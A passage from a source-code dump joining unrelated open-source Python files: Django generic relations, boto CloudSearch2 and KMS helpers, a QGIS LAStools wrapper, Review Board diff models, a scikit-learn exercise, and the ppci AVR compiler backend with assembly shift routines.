queryset = super(GenericRelatedObjectManager, self).get_queryset()
queryset._add_hints(instance=instances[0])
queryset = queryset.using(queryset._db or self._db)
query = {
'%s__pk' % self.content_type_field_name: self.content_type.id,
'%s__in' % self.object_id_field_name: set(obj._get_pk_val() for obj in instances)
}
# We (possibly) need to convert object IDs to the type of the
# instances' PK in order to match up instances:
object_id_converter = instances[0]._meta.pk.to_python
return (queryset.filter(**query),
lambda relobj: object_id_converter(getattr(relobj, self.object_id_field_name)),
lambda obj: obj._get_pk_val(),
False,
self.prefetch_cache_name)
def add(self, *objs):
db = router.db_for_write(self.model, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
for obj in objs:
if not isinstance(obj, self.model):
raise TypeError("'%s' instance expected" % self.model._meta.object_name)
setattr(obj, self.content_type_field_name, self.content_type)
setattr(obj, self.object_id_field_name, self.pk_val)
obj.save()
add.alters_data = True
def remove(self, *objs, **kwargs):
if not objs:
return
bulk = kwargs.pop('bulk', True)
self._clear(self.filter(pk__in=[o.pk for o in objs]), bulk)
remove.alters_data = True
def clear(self, **kwargs):
bulk = kwargs.pop('bulk', True)
self._clear(self, bulk)
clear.alters_data = True
def _clear(self, queryset, bulk):
db = router.db_for_write(self.model, instance=self.instance)
queryset = queryset.using(db)
if bulk:
# `QuerySet.delete()` creates its own atomic block which
# contains the `pre_delete` and `post_delete` signal handlers.
queryset.delete()
else:
with transaction.atomic(using=db, savepoint=False):
for obj in queryset:
obj.delete()
_clear.alters_data = True
def set(self, objs, **kwargs):
# Force evaluation of `objs` in case it's a queryset whose value
# could be affected by `manager.clear()`. Refs #19816.
objs = tuple(objs)
clear = kwargs.pop('clear', False)
db = router.db_for_write(self.model, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
if clear:
self.clear()
self.add(*objs)
else:
old_objs = set(self.using(db).all())
new_objs = []
for obj in objs:
if obj in old_objs:
old_objs.remove(obj)
else:
new_objs.append(obj)
self.remove(*old_objs)
self.add(*new_objs)
set.alters_data = True
def create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).create(**kwargs)
create.alters_data = True
def get_or_create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).get_or_create(**kwargs)
get_or_create.alters_data = True
def update_or_create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).update_or_create(**kwargs)
update_or_create.alters_data = True
return GenericRelatedObjectManager
| bsd-3-clause |
pratikmallya/hue | desktop/core/ext-py/boto-2.38.0/boto/cloudsearch2/document.py | 136 | 11630 | # Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto.exception
from boto.compat import json
import requests
import boto
from boto.cloudsearchdomain.layer1 import CloudSearchDomainConnection
class SearchServiceException(Exception):
pass
class CommitMismatchError(Exception):
# Let's do some extra work and let the user handle errors on his/her own.
errors = None
class EncodingError(Exception):
"""
Content sent for Cloud Search indexing was incorrectly encoded.
This usually happens when a document is marked as unicode but non-unicode
characters are present.
"""
pass
class ContentTooLongError(Exception):
"""
Content sent for Cloud Search indexing was too long
This will usually happen when documents queued for indexing add up to more
than the limit allowed per upload batch (5MB)
"""
pass
class DocumentServiceConnection(object):
"""
A CloudSearch document service.
The DocumentServiceConnection is used to add, remove and update documents in
CloudSearch. Commands are uploaded to CloudSearch in SDF (Search Document
Format).
To generate an appropriate SDF, use :func:`add` to add or update documents,
as well as :func:`delete` to remove documents.
Once the set of documents is ready to be indexed, use :func:`commit` to send
the commands to CloudSearch.
If there are a lot of documents to index, it may be preferable to split the
generation of SDF data and the actual uploading into CloudSearch. Retrieve
the current SDF with :func:`get_sdf`. If this file is then uploaded to S3,
it can be retrieved back afterwards for upload into CloudSearch using
:func:`add_sdf_from_s3`.
The SDF is not cleared after a :func:`commit`. If you wish to continue
using the DocumentServiceConnection for another batch upload of commands,
you will need to :func:`clear_sdf` first to stop the previous batch of
commands from being uploaded again.
"""
def __init__(self, domain=None, endpoint=None):
self.domain = domain
self.endpoint = endpoint
if not self.endpoint:
self.endpoint = domain.doc_service_endpoint
self.documents_batch = []
self._sdf = None
# Copy proxy settings from connection and check if request should be signed
self.proxy = {}
self.sign_request = False
if self.domain and self.domain.layer1:
if self.domain.layer1.use_proxy:
self.proxy = {'http': self.domain.layer1.get_proxy_url_with_auth()}
self.sign_request = getattr(self.domain.layer1, 'sign_request', False)
if self.sign_request:
# Create a domain connection to send signed requests
layer1 = self.domain.layer1
self.domain_connection = CloudSearchDomainConnection(
host=self.endpoint,
aws_access_key_id=layer1.aws_access_key_id,
aws_secret_access_key=layer1.aws_secret_access_key,
region=layer1.region,
provider=layer1.provider
)
def add(self, _id, fields):
"""
Add a document to be processed by the DocumentService
The document will not actually be added until :func:`commit` is called
:type _id: string
:param _id: A unique ID used to refer to this document.
:type fields: dict
:param fields: A dictionary of key-value pairs to be uploaded.
"""
d = {'type': 'add', 'id': _id, 'fields': fields}
self.documents_batch.append(d)
def delete(self, _id):
"""
Schedule a document to be removed from the CloudSearch service
The document will not actually be scheduled for removal until
:func:`commit` is called
:type _id: string
:param _id: The unique ID of this document.
"""
d = {'type': 'delete', 'id': _id}
self.documents_batch.append(d)
def get_sdf(self):
"""
Generate the working set of documents in Search Data Format (SDF)
:rtype: string
:returns: JSON-formatted string of the documents in SDF
"""
return self._sdf if self._sdf else json.dumps(self.documents_batch)
def clear_sdf(self):
"""
Clear the working documents from this DocumentServiceConnection
This should be used after :func:`commit` if the connection will be
reused for another set of documents.
"""
self._sdf = None
self.documents_batch = []
def add_sdf_from_s3(self, key_obj):
"""
Load an SDF from S3
Using this method will result in documents added through
:func:`add` and :func:`delete` being ignored.
:type key_obj: :class:`boto.s3.key.Key`
:param key_obj: An S3 key which contains an SDF
"""
# @todo: (lucas) would be nice if this could just take an s3://uri...
self._sdf = key_obj.get_contents_as_string()
def _commit_with_auth(self, sdf, api_version):
return self.domain_connection.upload_documents(sdf, 'application/json')
def _commit_without_auth(self, sdf, api_version):
url = "http://%s/%s/documents/batch" % (self.endpoint, api_version)
# Keep-alive is automatic in a post-1.0 requests world.
session = requests.Session()
session.proxies = self.proxy
adapter = requests.adapters.HTTPAdapter(
pool_connections=20,
pool_maxsize=50,
max_retries=5
)
session.mount('http://', adapter)
session.mount('https://', adapter)
resp = session.post(url, data=sdf, headers={'Content-Type': 'application/json'})
return resp
def commit(self):
"""
Actually send an SDF to CloudSearch for processing
If an SDF file has been explicitly loaded it will be used. Otherwise,
documents added through :func:`add` and :func:`delete` will be used.
:rtype: :class:`CommitResponse`
:returns: A summary of documents added and deleted
"""
sdf = self.get_sdf()
if ': null' in sdf:
boto.log.error('null value in sdf detected. This will probably '
'raise 500 error.')
index = sdf.index(': null')
boto.log.error(sdf[index - 100:index + 100])
api_version = '2013-01-01'
if self.domain and self.domain.layer1:
api_version = self.domain.layer1.APIVersion
if self.sign_request:
r = self._commit_with_auth(sdf, api_version)
else:
r = self._commit_without_auth(sdf, api_version)
return CommitResponse(r, self, sdf, signed_request=self.sign_request)
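# Usage sketch (the endpoint and document fields below are illustrative, not
# part of this module):
#
#     conn = DocumentServiceConnection(
#         endpoint='doc-demo.us-east-1.cloudsearch.amazonaws.com')
#     conn.add('doc-1', {'title': 'Hello', 'tags': ['a', 'b']})
#     conn.delete('doc-2')
#     response = conn.commit()  # returns a CommitResponse
#     conn.clear_sdf()          # reset before reusing the connection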
class CommitResponse(object):
"""Wrapper for response to Cloudsearch document batch commit.
:type response: :class:`requests.models.Response`
:param response: Response from Cloudsearch /documents/batch API
:type doc_service: :class:`boto.cloudsearch2.document.DocumentServiceConnection`
:param doc_service: Object containing the documents posted and methods to
retry
:raises: :class:`boto.exception.BotoServerError`
:raises: :class:`boto.cloudsearch2.document.SearchServiceException`
:raises: :class:`boto.cloudsearch2.document.EncodingError`
:raises: :class:`boto.cloudsearch2.document.ContentTooLongError`
"""
def __init__(self, response, doc_service, sdf, signed_request=False):
self.response = response
self.doc_service = doc_service
self.sdf = sdf
self.signed_request = signed_request
if self.signed_request:
self.content = response
else:
_body = response.content.decode('utf-8')
try:
self.content = json.loads(_body)
except:
boto.log.error('Error indexing documents.\nResponse Content:\n{0}'
'\n\nSDF:\n{1}'.format(_body, self.sdf))
raise boto.exception.BotoServerError(self.response.status_code, '',
body=_body)
self.status = self.content['status']
if self.status == 'error':
self.errors = [e.get('message') for e in self.content.get('errors',
[])]
for e in self.errors:
if "Illegal Unicode character" in e:
raise EncodingError("Illegal Unicode character in document")
elif e == "The Content-Length is too long":
raise ContentTooLongError("Content was too long")
else:
self.errors = []
self.adds = self.content['adds']
self.deletes = self.content['deletes']
self._check_num_ops('add', self.adds)
self._check_num_ops('delete', self.deletes)
def _check_num_ops(self, type_, response_num):
"""Raise exception if number of ops in response doesn't match commit
:type type_: str
:param type_: Type of commit operation: 'add' or 'delete'
:type response_num: int
:param response_num: Number of adds or deletes in the response.
:raises: :class:`boto.cloudsearch2.document.CommitMismatchError`
"""
commit_num = len([d for d in self.doc_service.documents_batch
if d['type'] == type_])
if response_num != commit_num:
if self.signed_request:
boto.log.debug(self.response)
else:
boto.log.debug(self.response.content)
# There will always be a commit mismatch error if there are any
# errors on cloudsearch. self.errors gets lost when this
# CommitMismatchError is raised. Whoever is using boto has no idea
# why their commit failed. They can't even notify the user of the
# cause by parsing the error messages from amazon. So let's
# attach the self.errors to the exceptions if we already spent
# time and effort collecting them out of the response.
exc = CommitMismatchError(
'Incorrect number of {0}s returned. Commit: {1} Response: {2}'
.format(type_, commit_num, response_num)
)
exc.errors = self.errors
raise exc
| apache-2.0 |
NewpTone/stacklab-nova | debian/python-nova/usr/share/pyshared/nova/api/openstack/volume/contrib/__init__.py | 8 | 1284 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Contrib contains extensions that are shipped with nova.
It can't be called 'extensions' because that causes namespacing problems.
"""
from nova.api.openstack import extensions
from nova import flags
from nova.openstack.common import log as logging
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
def standard_extensions(ext_mgr):
extensions.load_standard_extensions(ext_mgr, LOG, __path__, __package__)
def select_extensions(ext_mgr):
extensions.load_standard_extensions(ext_mgr, LOG, __path__, __package__,
FLAGS.osapi_volume_ext_list)
| apache-2.0 |
dracos/QGIS | python/plugins/processing/algs/lidar/lastools/lasmerge.py | 2 | 3710 | # -*- coding: utf-8 -*-
"""
***************************************************************************
lasmerge.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Martin Isenburg'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Martin Isenburg'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterFile
class lasmerge(LAStoolsAlgorithm):
FILE2 = "FILE2"
FILE3 = "FILE3"
FILE4 = "FILE4"
FILE5 = "FILE5"
FILE6 = "FILE6"
FILE7 = "FILE7"
def defineCharacteristics(self):
self.name = "lasmerge"
self.group = "LAStools"
self.addParametersVerboseGUI()
self.addParametersFilesAreFlightlinesGUI()
self.addParametersApplyFileSourceIdGUI()
self.addParametersPointInputGUI()
self.addParameter(ParameterFile(lasmerge.FILE2, self.tr("2nd file")))
self.addParameter(ParameterFile(lasmerge.FILE3, self.tr("3rd file")))
self.addParameter(ParameterFile(lasmerge.FILE4, self.tr("4th file")))
self.addParameter(ParameterFile(lasmerge.FILE5, self.tr("5th file")))
self.addParameter(ParameterFile(lasmerge.FILE6, self.tr("6th file")))
self.addParameter(ParameterFile(lasmerge.FILE7, self.tr("7th file")))
self.addParametersPointOutputGUI()
self.addParametersAdditionalGUI()
def processAlgorithm(self, progress):
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasmerge")]
self.addParametersVerboseCommands(commands)
self.addParametersPointInputCommands(commands)
for extra_input in (lasmerge.FILE2, lasmerge.FILE3, lasmerge.FILE4,
                    lasmerge.FILE5, lasmerge.FILE6, lasmerge.FILE7):
    extra_file = self.getParameterValue(extra_input)
    if extra_file is not None:
        commands.append("-i")
        commands.append(extra_file)
self.addParametersFilesAreFlightlinesCommands(commands)
self.addParametersApplyFileSourceIdCommands(commands)
self.addParametersPointOutputCommands(commands)
self.addParametersAdditionalCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
| gpl-2.0 |
chazy/reviewboard | reviewboard/diffviewer/models.py | 1 | 3892 | from datetime import datetime
from django.db import models
from django.utils.translation import ugettext_lazy as _
from djblets.util.fields import Base64Field
from reviewboard.scmtools.models import Repository
class FileDiff(models.Model):
"""
A diff of a single file.
This contains the patch and information needed to produce original and
patched versions of a single file in a repository.
"""
MODIFIED = 'M'
DELETED = 'D'
STATUSES = (
(MODIFIED, _('Modified')),
(DELETED, _('Deleted')),
)
diffset = models.ForeignKey('DiffSet',
related_name='files',
verbose_name=_("diff set"))
source_file = models.CharField(_("source file"), max_length=1024)
dest_file = models.CharField(_("destination file"), max_length=1024)
source_revision = models.CharField(_("source file revision"),
max_length=512)
dest_detail = models.CharField(_("destination file details"),
max_length=512)
diff = Base64Field(_("diff"), db_column="diff_base64")
binary = models.BooleanField(_("binary file"), default=False)
parent_diff = Base64Field(_("parent diff"), db_column="parent_diff_base64",
blank=True)
status = models.CharField(_("status"), max_length=1, choices=STATUSES)
@property
def deleted(self):
return self.status == 'D'
def __unicode__(self):
return u"%s (%s) -> %s (%s)" % (self.source_file, self.source_revision,
self.dest_file, self.dest_detail)
class DiffSet(models.Model):
"""
A revisioned collection of FileDiffs.
"""
name = models.CharField(_('name'), max_length=256)
revision = models.IntegerField(_("revision"))
timestamp = models.DateTimeField(_("timestamp"), default=datetime.now)
basedir = models.CharField(_('base directory'), max_length=256,
blank=True, default='')
history = models.ForeignKey('DiffSetHistory', null=True,
related_name="diffsets",
verbose_name=_("diff set history"))
repository = models.ForeignKey(Repository, related_name="diffsets",
verbose_name=_("repository"))
diffcompat = models.IntegerField(
_('differ compatibility version'),
default=0,
help_text=_("The diff generator compatibility version to use. "
"This can and should be ignored."))
def save(self, **kwargs):
"""
Saves this diffset.
This will set an initial revision of 1 if this is the first diffset
in the history, and will set it to one more than the revision of the
most recent diffset otherwise.
"""
if self.revision == 0 and self.history is not None:
if self.history.diffsets.count() == 0:
# Start on revision 1. It's more human-grokable.
self.revision = 1
else:
self.revision = self.history.diffsets.latest().revision + 1
super(DiffSet, self).save()
def __unicode__(self):
return u"[%s] %s r%s" % (self.id, self.name, self.revision)
class Meta:
get_latest_by = 'revision'
ordering = ['revision', 'timestamp']
class DiffSetHistory(models.Model):
"""
A collection of diffsets.
This gives us a way to store and keep track of multiple revisions of
diffsets belonging to an object.
"""
name = models.CharField(_('name'), max_length=256)
timestamp = models.DateTimeField(_("timestamp"), default=datetime.now)
def __unicode__(self):
return u'Diff Set History (%s revisions)' % self.diffsets.count()
class Meta:
verbose_name_plural = "Diff set histories"
| mit |
tpodowd/boto | boto/kms/__init__.py | 113 | 1640 | # Copyright (c) 2014 Amazon.com, Inc. or its affiliates.
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.regioninfo import RegionInfo, get_regions
def regions():
"""
Get all available regions for the AWS Key Management Service.
:rtype: list
:return: A list of :class:`boto.regioninfo.RegionInfo`
"""
from boto.kms.layer1 import KMSConnection
return get_regions('kms', connection_cls=KMSConnection)
def connect_to_region(region_name, **kw_params):
for region in regions():
if region.name == region_name:
return region.connect(**kw_params)
return None
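# Usage sketch (the region name is illustrative):
#
#     conn = connect_to_region('us-east-1')
#     if conn is None:
#         raise ValueError('no such KMS region')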
| mit |
sarahgrogan/scikit-learn | doc/tutorial/text_analytics/skeletons/exercise_01_language_train_model.py | 254 | 2005 | """Build a language detector model
The goal of this exercise is to train a linear classifier on text features
that represent sequences of up to 3 consecutive characters so as to
recognize natural languages by using the frequencies of short character
sequences as 'fingerprints'.
"""
# Author: Olivier Grisel <olivier.grisel@ensta.org>
# License: Simplified BSD
import sys
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import Perceptron
from sklearn.pipeline import Pipeline
from sklearn.datasets import load_files
from sklearn.cross_validation import train_test_split
from sklearn import metrics
# The training data folder must be passed as first argument
languages_data_folder = sys.argv[1]
dataset = load_files(languages_data_folder)
# Split the dataset in training and test set:
docs_train, docs_test, y_train, y_test = train_test_split(
dataset.data, dataset.target, test_size=0.5)
# TASK: Build a vectorizer that splits strings into sequences of 1 to 3
# characters instead of word tokens
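# One possible solution (sketch; parameter choices are illustrative):
vectorizer = TfidfVectorizer(analyzer='char', ngram_range=(1, 3))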
# TASK: Build a vectorizer / classifier pipeline using the previous analyzer
# the pipeline instance should be stored in a variable named clf
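# One possible solution (sketch):
clf = Pipeline([
    ('vec', vectorizer),
    ('clf', Perceptron()),
])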
# TASK: Fit the pipeline on the training set
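# One possible solution (sketch):
clf.fit(docs_train, y_train)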
# TASK: Predict the outcome on the testing set in a variable named y_predicted
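# One possible solution (sketch):
y_predicted = clf.predict(docs_test)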
# Print the classification report
print(metrics.classification_report(y_test, y_predicted,
target_names=dataset.target_names))
# Plot the confusion matrix
cm = metrics.confusion_matrix(y_test, y_predicted)
print(cm)
#import pylab as pl
#pl.matshow(cm, cmap=pl.cm.jet)
#pl.show()
# Predict the result on some short new sentences:
sentences = [
u'This is a language detection test.',
u'Ceci est un test de d\xe9tection de la langue.',
u'Dies ist ein Test, um die Sprache zu erkennen.',
]
predicted = clf.predict(sentences)
for s, p in zip(sentences, predicted):
print(u'The language of "%s" is "%s"' % (s, dataset.target_names[p]))
| bsd-3-clause |
windelbouwman/ppci-mirror | ppci/arch/avr/arch.py | 1 | 11632 | """ AVR architecture.
See for good documentation about AVR ABI:
- https://gcc.gnu.org/wiki/avr-gcc
The stack grows downwards in AVR. The stack pointer points to the current
empty stack slot. This is somewhat confusing, because on other machines
the stack pointer points to the latest pushed byte.
The stack frame is laid out as follows:
+----+-----------------------------+
| 90 | Incoming arguments |
| 89 | for previous frame |
+----+-----------------------------+
| 88 | return address |
| 87 | |
+----+-----------------------------+
| 86 | |
| 85 | saved registers previous |
| 84 | frame |
+----+-----------------------------+
| 83 | |
| 82 | stack for previous frame |
| 81 | |
+----+-----------------------------+
| 80 | |
| 79 | Incoming arguments for |
| 78 | current frame |
+----+-----------------------------+
| 77 | return address |
| 76 | |
+----+-----------------------------+
| 75 | |
| 74 | saved registers current |
| 73 | frame |
+----+-----------------------------+
| 72 | |
| 71 | |
| 70 | Stack for the current frame |
| 69 | | <- pointed to by Y
+----+-----------------------------+
| 68 | | <- stack pointer
Stack grows
    ||
    \/
"""
import io
from ... import ir
from ...binutils.assembler import BaseAssembler
from ..arch import Architecture
from ..arch_info import ArchInfo, TypeInfo
from ..generic_instructions import Label, Alignment, SectionInstruction
from ..generic_instructions import RegisterUseDef
from ..data_instructions import data_isa
from ..data_instructions import Db
from ..runtime import get_runtime_files
from ..stack import FramePointerLocation
from . import registers, instructions
from .instructions import avr_isa
from .instructions import Push, Pop, Mov, Call, In, Movw, Ret, Adiw
from .registers import AvrRegister, Register
from .registers import AvrWordRegister
from .registers import r0, PC
from .registers import r8, r9, r10, r11, r12, r13, r14, r15
from .registers import r16, r17, r18, r19, r20, r21, r22, r23
from .registers import r24, r25, W, Y, Z
from .registers import caller_save, callee_save
from .registers import get16reg, register_classes, gdb_registers
class AvrArch(Architecture):
""" Avr architecture description. """
name = "avr"
def __init__(self, options=None):
super().__init__(options=options)
self.isa = avr_isa + data_isa
self.assembler = BaseAssembler()
self.assembler.gen_asm_parser(self.isa)
# TODO: make it possible to choose between 16 and 8 bit int type size
# with an option -mint8 every integer is 8 bits wide.
self.info = ArchInfo(
type_infos={
ir.i8: TypeInfo(1, 1),
ir.u8: TypeInfo(1, 1),
ir.i16: TypeInfo(2, 2),
ir.u16: TypeInfo(2, 2),
ir.f32: TypeInfo(4, 4),
ir.f64: TypeInfo(8, 8),
"int": ir.i16,
"ptr": ir.u16,
ir.ptr: ir.u16,
},
register_classes=register_classes,
)
self.fp = Y
self.fp_location = FramePointerLocation.BOTTOM
self.gdb_registers = gdb_registers
self.gdb_pc = PC
self.caller_save = caller_save
def get_runtime(self):
from ...api import asm, c3c, link
obj1 = asm(io.StringIO(asm_rt_src), self)
c3_sources = get_runtime_files(["sdiv", "smul"])
obj2 = c3c(c3_sources, [], self)
obj = link([obj1, obj2], partial_link=True)
return obj
def determine_arg_locations(self, arg_types):
""" Given a set of argument types, determine location for argument """
locations = []
regs = [
r25,
r24,
r23,
r22,
r21,
r20,
r19,
r18,
r17,
r16,
r15,
r14,
r13,
r12,
r11,
r10,
r9,
r8,
]
for a in arg_types:
sizes = {ir.i8: 1, ir.u8: 1, ir.i16: 2, ir.u16: 2, ir.ptr: 2}
s = sizes[a]
# Round odd registers:
if s % 2 == 1:
regs.pop(0)
# Determine register:
if s == 1:
r = regs.pop(0)
locations.append(r)
elif s == 2:
regs.pop(0)
lo_reg = regs.pop(0)
r = get16reg(lo_reg.num)
locations.append(r)
else: # pragma: no cover
raise NotImplementedError(str(s))
return locations
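    # Worked example (sketch): for arg_types == [ir.i16, ir.u8] the code
    # above yields locations == [W, r22]: the 16-bit argument travels in
    # the register pair r25:r24 (W); the byte argument is rounded up to an
    # even register boundary, so r23 is skipped and the value goes in r22,
    # allocating downwards from r25 as avr-gcc does.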
def determine_rv_location(self, ret_type):
rv = W
return rv
def expand_word_regs(self, registers):
s = set()
for register in registers:
if isinstance(register, AvrWordRegister):
s.add(register.hi)
s.add(register.lo)
else:
s.add(register)
return s
def gen_prologue(self, frame):
""" Generate the prologue instruction sequence. """
# Label indication function:
yield Label(frame.name)
# Save some registers:
used_regs = self.expand_word_regs(frame.used_regs)
for register in callee_save:
if register in used_regs:
yield Push(register)
if frame.stacksize > 0:
# Save previous frame pointer and fill it from the SP:
yield Push(Y.lo)
yield Push(Y.hi)
# Push N times to adjust stack:
for _ in range(frame.stacksize):
yield Push(r0)
# Setup frame pointer:
yield In(Y.lo, 0x3D)
yield In(Y.hi, 0x3E)
# ATTENTION: after push, the stack pointer points to the next
# empty byte.
# Increment entire Y by one to point to address frame+0:
yield Adiw(Y, 1)
def gen_epilogue(self, frame):
""" Return epilogue sequence for a frame. Adjust frame pointer
and add constant pool
"""
if frame.stacksize > 0:
# Pop x times to adjust stack:
for _ in range(frame.stacksize):
yield Pop(r0)
yield Pop(Y.hi)
yield Pop(Y.lo)
# Restore registers:
used_regs = self.expand_word_regs(frame.used_regs)
for register in reversed(callee_save):
if register in used_regs:
yield Pop(register)
yield Ret()
# Add final literal pool:
for instruction in self.litpool(frame):
yield instruction
yield Alignment(4) # Align at 4 bytes
def gen_call(self, frame, label, args, rv):
arg_types = [a[0] for a in args]
arg_locs = self.determine_arg_locations(arg_types)
# Copy parameters:
for arg_loc, arg2 in zip(arg_locs, args):
arg = arg2[1]
if isinstance(arg_loc, AvrRegister):
yield self.move(arg_loc, arg)
elif isinstance(arg_loc, AvrWordRegister):
yield self.move(arg_loc, arg)
else: # pragma: no cover
raise NotImplementedError("Parameters in memory not impl")
arg_regs = set(l for l in arg_locs if isinstance(l, Register))
yield RegisterUseDef(uses=arg_regs)
if isinstance(label, AvrWordRegister):
yield self.move(Z, label)
# Call to function at Z
# Divide Z by two, since PC is pointing to 16 bits words
yield instructions.Lsr(registers.r31)
yield instructions.Ror(registers.r30)
yield instructions.Icall(clobbers=self.caller_save)
else:
yield Call(label, clobbers=self.caller_save)
if rv:
retval_loc = self.determine_rv_location(rv[0])
yield RegisterUseDef(defs=(retval_loc,))
if isinstance(rv[1], AvrWordRegister):
yield self.move(rv[1], retval_loc)
else: # pragma: no cover
raise NotImplementedError("Parameters in memory not impl")
def gen_function_enter(self, args):
""" Copy arguments into local temporaries and mark registers live """
arg_types = [a[0] for a in args]
arg_locs = self.determine_arg_locations(arg_types)
arg_regs = set(l for l in arg_locs if isinstance(l, Register))
yield RegisterUseDef(defs=arg_regs)
# Copy parameters:
for arg_loc, arg2 in zip(arg_locs, args):
arg = arg2[1]
if isinstance(arg_loc, Register):
yield self.move(arg, arg_loc)
else: # pragma: no cover
raise NotImplementedError("Parameters in memory not impl")
def gen_function_exit(self, rv):
live_out = set()
if rv:
retval_loc = self.determine_rv_location(rv[0])
yield self.move(retval_loc, rv[1])
live_out.add(retval_loc)
yield RegisterUseDef(uses=live_out)
def litpool(self, frame):
""" Generate instruction for the current literals """
# Align at 4 bytes
if frame.constants:
yield SectionInstruction("data")
yield Alignment(4)
# Add constant literals:
while frame.constants:
label, value = frame.constants.pop(0)
yield Label(label)
if isinstance(value, bytes):
for byte in value:
yield Db(byte)
yield Alignment(4) # Align at 4 bytes
else: # pragma: no cover
raise NotImplementedError(
"Constant of type {}".format(value)
)
yield SectionInstruction("code")
def between_blocks(self, frame):
for instruction in self.litpool(frame):
yield instruction
def move(self, dst, src):
""" Generate a move from src to dst """
if isinstance(dst, AvrRegister) and isinstance(src, AvrRegister):
return Mov(dst, src, ismove=True)
elif isinstance(dst, AvrWordRegister) and isinstance(
src, AvrWordRegister
):
return Movw(dst, src, ismove=True)
else: # pragma: no cover
raise NotImplementedError()
asm_rt_src = """
; shift r25:r24 right by r22 bits
global __shr16
__shr16:
push r16
mov r16, r22
cpi r16, 0
breq __shr16_2
__shr16_1:
lsr r25
ror r24
dec r16
cpi r16, 0
brne __shr16_1
__shr16_2:
pop r16
ret
; shift r24 right by r22 bits
global __shr8
__shr8:
push r16
mov r16, r22
cpi r16, 0
breq __shr8_2
__shr8_1:
lsr r24
dec r16
cpi r16, 0
brne __shr8_1
__shr8_2:
pop r16
ret
; shift r25:r24 left by r22 bits
global __shl16
__shl16:
push r16
mov r16, r22
cpi r16, 0
breq __shl16_2
__shl16_1:
add r24, r24
adc r25, r25
dec r16
cpi r16, 0
brne __shl16_1
__shl16_2:
pop r16
ret
; shift r24 left by r22 bits
global __shl8
__shl8:
push r16
mov r16, r22
cpi r16, 0
breq __shl8_2
__shl8_1:
add r24, r24
dec r16
cpi r16, 0
brne __shl8_1
__shl8_2:
pop r16
ret
"""
| bsd-2-clause |
potatolondon/django-nonrel-1-4 | tests/regressiontests/utils/simplelazyobject.py | 33 | 3440 | import copy
import pickle
from django.utils.unittest import TestCase
from django.utils.functional import SimpleLazyObject, empty
class _ComplexObject(object):
def __init__(self, name):
self.name = name
def __eq__(self, other):
return self.name == other.name
def __hash__(self):
return hash(self.name)
def __str__(self):
return "I am _ComplexObject(%r)" % self.name
def __unicode__(self):
return unicode(self.name)
def __repr__(self):
return "_ComplexObject(%r)" % self.name
complex_object = lambda: _ComplexObject("joe")
